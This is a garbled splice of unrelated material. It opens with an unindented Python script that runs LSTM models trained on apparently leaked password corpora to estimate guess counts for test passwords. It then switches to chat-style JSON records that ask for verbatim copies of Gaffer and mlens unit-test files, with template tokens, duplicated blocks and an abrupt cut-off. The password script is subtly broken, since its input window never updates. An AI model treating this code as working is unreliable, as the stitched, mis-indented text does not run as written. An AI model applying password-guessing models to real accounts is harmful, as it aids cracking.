john_char_indices = {'9': 16, 'Q': 35, '6': 13, '~': 72, '7': 14, 'E': 23, 'h': 52, 'b': 46, '2': 9, '1': 8, ';': 17, 'y': 69, 'I': 27, '$': 2, 'o': 59, 'e': 49, 'F': 24, 'O': 33, 'B': 20, 'q': 61, 'w': 67, 'v': 66, 'U': 39, '5': 12, 'A': 19, 'S': 37, 'x': 68, 'p': 60, '`': 71, '8': 15, '#': 1, 'J': 28, 'm': 57, 'i': 53, 'V': 40, '*': 5, 'n': 58, 'j': 54, 'R': 36, 'K': 29, 'N': 32, 'f': 50, 's': 63, 'c': 47, '0': 7, 'z': 70, 't': 64, 'l': 56, 'C': 21, '-': 6, 'k': 55, 'Y': 42, 'M': 31, 'g': 51, 'd': 48, 'D': 22, '4': 11, 'P': 34, 'u': 65, 'H': 26, 'r': 62, 'W': 41, 'G': 25, '^': 44, '&': 4, 'L': 30, 'T': 38, 'Z': 43, '%': 3, '!': 0, '@': 18, 'a': 45, '3': 10}
myspace_char_indices = {'9': 25, ')': 9, "'": 7, 'G': 37, '7': 23, 'E': 35, 'F': 36, '+': 11, '2': 18, ';': 26, 'I': 39, '$': 4, 'o': 77, 'D': 34, 'x': 86, 'B': 32, 'w': 85, 'U': 51, '5': 21, 'J': 40, 'a': 63, '\\': 58, '`': 62, '8': 24, '~': 91, 'm': 75, '/': 15, 'Q': 47, '*': 10, 'j': 72, 'R': 48, 'K': 41, ' ': 0, 'z': 88, '(': 8, 'C': 33, '-': 13, 'k': 73, 'M': 43, 'u': 83, 'H': 38, 'r': 80, '^': 60, '&': 6, '"': 2, 'L': 42, 'T': 50, 'l': 74, 'X': 54, '@': 30, 'c': 65, '3': 19, 'N': 44, '{': 89, '6': 22, 'y': 87, 'h': 70, ']': 59, 'b': 64, '1': 17, '?': 29, 'e': 67, 'Z': 56, '[': 57, '%': 5, 'q': 79, 'v': 84, 'd': 66, '}': 90, 'A': 31, 'S': 49, ',': 12, 'O': 45, '#': 3, 'i': 71, '.': 14, 'V': 52, 'p': 78, 'n': 76, '4': 20, '>': 28, 'f': 68, 't': 82, 'Y': 55, 'g': 69, '!': 1, 'P': 46, 'W': 53, 's': 81, '_': 61, '0': 16, '=': 27}
john_data = ['john', 25, 73, john_char_indices]
myspace_data = ['myspace', 28, 94, myspace_char_indices]
test_sets = []
for i in ['500','1000']:
for j in ['FourType', 'ThreeType', 'FirstThreeChar']:
name = j + i
test_sets.append(name)
#
data_sets = [myspace_data, john_data]
#test_sets = test_sets + ['myspace', 'phpbb', 'john', 'cain']
#test_sets = test_sets + ['bookWordsFirstLetter','8type3','16type3']
#MAX_SIZE = 16
sentence_size = 12
orig_path = './passwordGen/passwordFiles/'
for i in range(len(data_sets)):
name = data_sets[i][0]
maxlen = data_sets[i][1]
chars = data_sets[i][2]
char_indices = data_sets[i][3]
model = Sequential()
model.add(LSTM(128, input_shape=(maxlen, chars)))
model.add(Dense(chars))
model.add(Activation('softmax'))
optimizer = RMSprop(lr=0.01)
model.compile(loss='categorical_crossentropy', optimizer=optimizer)
model.load_weights("model_" + str(name) + ".h5")
model.compile(loss='categorical_crossentropy', optimizer=optimizer)
print(model.summary())
for testname in test_sets:
path = orig_path + testname + '.txt'
text = open(path,'r',encoding='ascii',errors='ignore').read()#.lower()
data = np.array(text.split('\n'))
data = data[:-1]
#data = data[:14000000]
data = np.array([line for line in data if len(line) <= 32])
if len(data) > 500:
data = np.random.choice(data, 500, replace=False)
fullInfo = []
sentenceBase = np.array([char_indices['~']]*12)
for passCount, password_orig in enumerate(data):
if passCount % 100 == 0:
print(passCount, '/', len(data))
# Calc prob
sentence = sentenceBase
passlen = len(password_orig)
password = [char_indices[c] for c in password_orig if c in char_indices]
if passlen != len(password):
continue
password.append(char_indices['`'])
passlen = passlen+1
passProb = 1
for i in range(passlen-1):
#print(i)
x = np.zeros((1, maxlen, chars))
np.delete(sentence,0)
np.append(sentence, password[i])
#print(sentence[0])
for t, char in enumerate(sentence):
x[0, t, char] = 1.
#sentence = sentence[1:] + [password[i]]
preds = model.predict(x, verbose=0)[0]
if i < passlen-2:
passProb = passProb * preds[password[i+1]]
#z = model.predict(curArray)
passGuessCount = 1/passProb
#print(password[:-1], '\t', passGuessCount, '\n')
fullInfo.append([passGuessCount, password_orig])
fullInfo.sort()
#fullInfo.reverse()
fullString = [d[1] + '\t' + str(d[0]) for d in fullInfo]
fullString = '\n'.join(fullString)
saveFileName = name + '_on_' + testname + '.txt'
saveFile = open(saveFileName, 'w')
saveFile.write(fullString)
saveFile.close()
```
|
[
{
"content": "Recreate the entire code block with identical formatting:\n```python\n##########################################################################\n# \n# Copyright (c) 2014, John Haddon. All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n# \n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n# \n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n# \n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# \n##########################################################################\n\nimport IECore\n\nimport Gaffer\nimport GafferScene\nimport GafferSceneTest\n\nclass PrimitiveVariablesTest( GafferSceneTest.SceneTestCase ) :\n\t\t\n\tdef test( self ) :\n\t\n\t\ts = GafferScene.Sphere()\n\t\tp = GafferScene.PrimitiveVariables()\n\t\tp[\"in\"].setInput( s[\"out\"] )\n\t\t\n\t\tself.assertScenesEqual( s[\"out\"], p[\"out\"] )\n\t\tself.assertSceneHashesEqual( s[\"out\"], p[\"out\"] )\n\t\t\n\t\tp[\"primitiveVariables\"].addMember( \"a\", IECore.IntData( 10 ) )\n\t\t\n\t\tself.assertScenesEqual( s[\"out\"], p[\"out\"], childPlugNamesToIgnore=( \"object\", ) )\n\t\tself.assertSceneHashesEqual( s[\"out\"], p[\"out\"], childPlugNamesToIgnore=( \"object\", ) )\n\t\t\n\t\tself.assertNotEqual( s[\"out\"].objectHash( \"/sphere\" ), p[\"out\"].objectHash( \"/sphere\" ) )\n\t\tself.assertNotEqual( s[\"out\"].object( \"/sphere\" ), p[\"out\"].object( \"/sphere\" ) )\n\t\t\n\t\to1 = s[\"out\"].object( \"/sphere\" )\n\t\to2 = p[\"out\"].object( \"/sphere\" )\n\t\t\n\t\tself.assertEqual( set( o1.keys() + [ \"a\" ] ), set( o2.keys() ) )\n\t\tself.assertEqual( o2[\"a\"], IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Constant, IECore.IntData( 10 ) ) )\n\t\t\n\t\tdel o2[\"a\"]\n\t\tself.assertEqual( o1, o2 )\n\t\t\nif __name__ == \"__main__\":\n\tunittest.main()\n```",
"role": "user"
}
] |
[
{
"content": "Recreate the entire code block with identical formatting:\n<|memory_start|>```python\n##########################################################################\n# \n# Copyright (c) 2014, John Haddon. All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n# \n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n# \n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n# \n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# \n##########################################################################\n\nimport IECore\n\nimport Gaffer\nimport GafferScene\nimport GafferSceneTest\n\nclass PrimitiveVariablesTest( GafferSceneTest.SceneTestCase ) :\n\t\t\n\tdef test( self ) :\n\t\n\t\ts = GafferScene.Sphere()\n\t\tp = GafferScene.PrimitiveVariables()\n\t\tp[\"in\"].setInput( s[\"out\"] )\n\t\t\n\t\tself.assertScenesEqual( s[\"out\"], p[\"out\"] )\n\t\tself.assertSceneHashesEqual( s[\"out\"], p[\"out\"] )\n\t\t\n\t\tp[\"primitiveVariables\"].addMember( \"a\", IECore.IntData( 10 ) )\n\t\t\n\t\tself.assertScenesEqual( s[\"out\"], p[\"out\"], childPlugNamesToIgnore=( \"object\", ) )\n\t\tself.assertSceneHashesEqual( s[\"out\"], p[\"out\"], childPlugNamesToIgnore=( \"object\", ) )\n\t\t\n\t\tself.assertNotEqual( s[\"out\"].objectHash( \"/sphere\" ), p[\"out\"].objectHash( \"/sphere\" ) )\n\t\tself.assertNotEqual( s[\"out\"].object( \"/sphere\" ), p[\"out\"].object( \"/sphere\" ) )\n\t\t\n\t\to1 = s[\"out\"].object( \"/sphere\" )\n\t\to2 = p[\"out\"].object( \"/sphere\" )\n\t\t\n\t\tself.assertEqual( set( o1.keys() + [ \"a\" ] ), set( o2.keys() ) )\n\t\tself.assertEqual( o2[\"a\"], IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Constant, IECore.IntData( 10 ) ) )\n\t\t\n\t\tdel o2[\"a\"]\n\t\tself.assertEqual( o1, o2 )\n\t\t\nif __name__ == \"__main__\":\n\tunittest.main()\n```<|memory_end|>",
"role": "user"
}
] |
```python
##########################################################################
#
# Copyright (c) 2014, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import Gaffer
import GafferScene
import GafferSceneTest
class PrimitiveVariablesTest( GafferSceneTest.SceneTestCase ) :
def test( self ) :
s = GafferScene.Sphere()
p = GafferScene.PrimitiveVariables()
p["in"].setInput( s["out"] )
self.assertScenesEqual( s["out"], p["out"] )
self.assertSceneHashesEqual( s["out"], p["out"] )
p["primitiveVariables"].addMember( "a", IECore.IntData( 10 ) )
self.assertScenesEqual( s["out"], p["out"], childPlugNamesToIgnore=( "object", ) )
self.assertSceneHashesEqual( s["out"], p["out"], childPlugNamesToIgnore=( "object", ) )
self.assertNotEqual( s["out"].objectHash( "/sphere" ), p["out"].objectHash( "/sphere" ) )
self.assertNotEqual( s["out"].object( "/sphere" ), p["out"].object( "/sphere" ) )
o1 = s["out"].object( "/sphere" )
o2 = p["out"].object( "/sphere" )
self.assertEqual( set( o1.keys() + [ "a" ] ), set( o2.keys() ) )
self.assertEqual( o2["a"], IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Constant, IECore.IntData( 10 ) ) )
del o2["a"]
self.assertEqual( o1, o2 )
if __name__ == "__main__":
unittest.main()
```
|
[
{
"content": "Replicate the source code:\n```python\n\"\"\"\nTest Scikit-learn\n\"\"\"\nimport numpy as np\nfrom mlens.ensemble import SuperLearner, Subsemble, BlendEnsemble, TemporalEnsemble\nfrom mlens.testing.dummy import return_pickled\ntry:\n from sklearn.utils.estimator_checks import check_estimator\n from sklearn.linear_model import Lasso, LinearRegression\n from sklearn.neighbors import KNeighborsRegressor\n from sklearn.svm import SVR\n from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\n\n from sklearn.decomposition import PCA\n from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n\n from sklearn.datasets import load_boston\n\n has_sklearn = True\n\nexcept ImportError:\n has_sklearn = False\n\n\nif has_sklearn:\n\n X, y = load_boston(True)\n\n estimators = [Lasso(),\n GradientBoostingRegressor(),\n LinearRegression(),\n KNeighborsRegressor(),\n SVR(gamma='scale'),\n RandomForestRegressor(n_estimators=100),\n ]\n\n est_prep = {'prep1': estimators,\n 'prep2': estimators,\n 'prep3': estimators}\n\n prep_1 = [PCA()]\n prep_2 = [PolynomialFeatures(), StandardScaler()]\n\n prep = {'prep1': prep_1,\n 'prep2': prep_2,\n 'prep3': []}\n\n def get_ensemble(cls, backend, preprocessing, **kwargs):\n \"\"\"Get ensemble.\"\"\"\n if preprocessing:\n est = est_prep\n else:\n est = estimators\n ens = cls(backend=backend, **kwargs)\n ens.add(est, preprocessing)\n ens.add(LinearRegression(), meta=True)\n return ens\n\n def test_super_learner_s_m():\n \"\"\"[SuperLearner] Test scikit-learn comp - mp | np\"\"\"\n ens = get_ensemble(SuperLearner, 'multiprocessing', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n def test_super_learner_f_m():\n \"\"\"[SuperLearner] Test scikit-learn comp - mp | p\"\"\"\n ens = get_ensemble(SuperLearner, 'multiprocessing', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_super_learner_s_t():\n \"\"\"[SuperLearner] Test scikit-learn comp - th | np\"\"\"\n ens = get_ensemble(SuperLearner, 'threading', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_super_learner_f_t():\n \"\"\"[SuperLearner] Test scikit-learn comp - th | p\"\"\"\n ens = get_ensemble(SuperLearner, 'threading', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_subsemble_s_m():\n \"\"\"[Subsemble] Test scikit-learn comp - mp | np\"\"\"\n ens = get_ensemble(Subsemble, 'multiprocessing', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n\n def test_subsemble_f_m():\n \"\"\"[Subsemble] Test scikit-learn comp - mp | p\"\"\"\n ens = get_ensemble(Subsemble, 'multiprocessing', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_subsemble_s_t():\n \"\"\"[Subsemble] Test scikit-learn comp - th | np\"\"\"\n ens = get_ensemble(Subsemble, 'threading', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_subsemble_f_t():\n \"\"\"[Subsemble] Test scikit-learn comp - th | p\"\"\"\n ens = get_ensemble(Subsemble, 'threading', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_blend_s_m():\n \"\"\"[BlendEnsemble] Test scikit-learn comp - mp | np\"\"\"\n ens = get_ensemble(BlendEnsemble, 'multiprocessing', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_blend_f_m():\n \"\"\"[BlendEnsemble] Test scikit-learn comp - mp | p\"\"\"\n ens = get_ensemble(BlendEnsemble, 'multiprocessing', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_blend_s_m():\n \"\"\"[BlendEnsemble] Test scikit-learn comp - th | np\"\"\"\n ens = get_ensemble(BlendEnsemble, 'threading', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_blend_f_m():\n \"\"\"[BlendEnsemble] Test scikit-learn comp - th | p\"\"\"\n ens = get_ensemble(BlendEnsemble, 'threading', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n def test_temporal_s_m():\n \"\"\"[TemporalEnsemble] Test scikit-learn comp - mp | np\"\"\"\n ens = get_ensemble(TemporalEnsemble, 'multiprocessing', None, step_size=10)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_temporal_f_m():\n \"\"\"[TemporalEnsemble] Test scikit-learn comp - mp | p\"\"\"\n ens = get_ensemble(TemporalEnsemble, 'multiprocessing', prep, step_size=10)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_temporal_s_m():\n \"\"\"[TemporalEnsemble] Test scikit-learn comp - th | np\"\"\"\n ens = get_ensemble(TemporalEnsemble, 'threading', None, step_size=10)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_temporal_f_m():\n \"\"\"[TemporalEnsemble] Test scikit-learn comp - th | p\"\"\"\n ens = get_ensemble(TemporalEnsemble, 'threading', prep, step_size=10)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n```\nPreserve indentation, whitespace, and order.",
"role": "user"
}
] |
[
{
"content": "Replicate the source code:\n<|memory_start|>```python\n\"\"\"\nTest Scikit-learn\n\"\"\"\nimport numpy as np\nfrom mlens.ensemble import SuperLearner, Subsemble, BlendEnsemble, TemporalEnsemble\nfrom mlens.testing.dummy import return_pickled\ntry:\n from sklearn.utils.estimator_checks import check_estimator\n from sklearn.linear_model import Lasso, LinearRegression\n from sklearn.neighbors import KNeighborsRegressor\n from sklearn.svm import SVR\n from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\n\n from sklearn.decomposition import PCA\n from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n\n from sklearn.datasets import load_boston\n\n has_sklearn = True\n\nexcept ImportError:\n has_sklearn = False\n\n\nif has_sklearn:\n\n X, y = load_boston(True)\n\n estimators = [Lasso(),\n GradientBoostingRegressor(),\n LinearRegression(),\n KNeighborsRegressor(),\n SVR(gamma='scale'),\n RandomForestRegressor(n_estimators=100),\n ]\n\n est_prep = {'prep1': estimators,\n 'prep2': estimators,\n 'prep3': estimators}\n\n prep_1 = [PCA()]\n prep_2 = [PolynomialFeatures(), StandardScaler()]\n\n prep = {'prep1': prep_1,\n 'prep2': prep_2,\n 'prep3': []}\n\n def get_ensemble(cls, backend, preprocessing, **kwargs):\n \"\"\"Get ensemble.\"\"\"\n if preprocessing:\n est = est_prep\n else:\n est = estimators\n ens = cls(backend=backend, **kwargs)\n ens.add(est, preprocessing)\n ens.add(LinearRegression(), meta=True)\n return ens\n\n def test_super_learner_s_m():\n \"\"\"[SuperLearner] Test scikit-learn comp - mp | np\"\"\"\n ens = get_ensemble(SuperLearner, 'multiprocessing', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n def test_super_learner_f_m():\n \"\"\"[SuperLearner] Test scikit-learn comp - mp | p\"\"\"\n ens = get_ensemble(SuperLearner, 'multiprocessing', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_super_learner_s_t():\n \"\"\"[SuperLearner] Test scikit-learn comp - th | np\"\"\"\n ens = get_ensemble(SuperLearner, 'threading', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_super_learner_f_t():\n \"\"\"[SuperLearner] Test scikit-learn comp - th | p\"\"\"\n ens = get_ensemble(SuperLearner, 'threading', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_subsemble_s_m():\n \"\"\"[Subsemble] Test scikit-learn comp - mp | np\"\"\"\n ens = get_ensemble(Subsemble, 'multiprocessing', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n\n def test_subsemble_f_m():\n \"\"\"[Subsemble] Test scikit-learn comp - mp | p\"\"\"\n ens = get_ensemble(Subsemble, 'multiprocessing', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_subsemble_s_t():\n \"\"\"[Subsemble] Test scikit-learn comp - th | np\"\"\"\n ens = get_ensemble(Subsemble, 'threading', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_subsemble_f_t():\n \"\"\"[Subsemble] Test scikit-learn comp - th | p\"\"\"\n ens = get_ensemble(Subsemble, 'threading', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_blend_s_m():\n \"\"\"[BlendEnsemble] Test scikit-learn comp - mp | np\"\"\"\n ens = get_ensemble(BlendEnsemble, 'multiprocessing', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_blend_f_m():\n \"\"\"[BlendEnsemble] Test scikit-learn comp - mp | p\"\"\"\n ens = get_ensemble(BlendEnsemble, 'multiprocessing', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_blend_s_m():\n \"\"\"[BlendEnsemble] Test scikit-learn comp - th | np\"\"\"\n ens = get_ensemble(BlendEnsemble, 'threading', None)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_blend_f_m():\n \"\"\"[BlendEnsemble] Test scikit-learn comp - th | p\"\"\"\n ens = get_ensemble(BlendEnsemble, 'threading', prep)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n def test_temporal_s_m():\n \"\"\"[TemporalEnsemble] Test scikit-learn comp - mp | np\"\"\"\n ens = get_ensemble(TemporalEnsemble, 'multiprocessing', None, step_size=10)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_temporal_f_m():\n \"\"\"[TemporalEnsemble] Test scikit-learn comp - mp | p\"\"\"\n ens = get_ensemble(TemporalEnsemble, 'multiprocessing', prep, step_size=10)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_temporal_s_m():\n \"\"\"[TemporalEnsemble] Test scikit-learn comp - th | np\"\"\"\n ens = get_ensemble(TemporalEnsemble, 'threading', None, step_size=10)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n\n\n def test_temporal_f_m():\n \"\"\"[TemporalEnsemble] Test scikit-learn comp - th | p\"\"\"\n ens = get_ensemble(TemporalEnsemble, 'threading', prep, step_size=10)\n ens.fit(X, y)\n p = ens.predict(X)\n assert p.shape == y.shape\n assert p.dtype == ens.layer_1.dtype\n\n ens = return_pickled(ens)\n pp = ens.predict(X)\n np.testing.assert_array_equal(p, pp)\n```<|memory_end|>\nPreserve indentation, whitespace, and order.",
"role": "user"
}
] |
```python
"""
Test Scikit-learn
"""
import numpy as np
from mlens.ensemble import SuperLearner, Subsemble, BlendEnsemble, TemporalEnsemble
from mlens.testing.dummy import return_pickled
try:
from sklearn.utils.estimator_checks import check_estimator
from sklearn.linear_model import Lasso, LinearRegression
from sklearn.neighbors import KNeighborsRegressor
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.decomposition import PCA
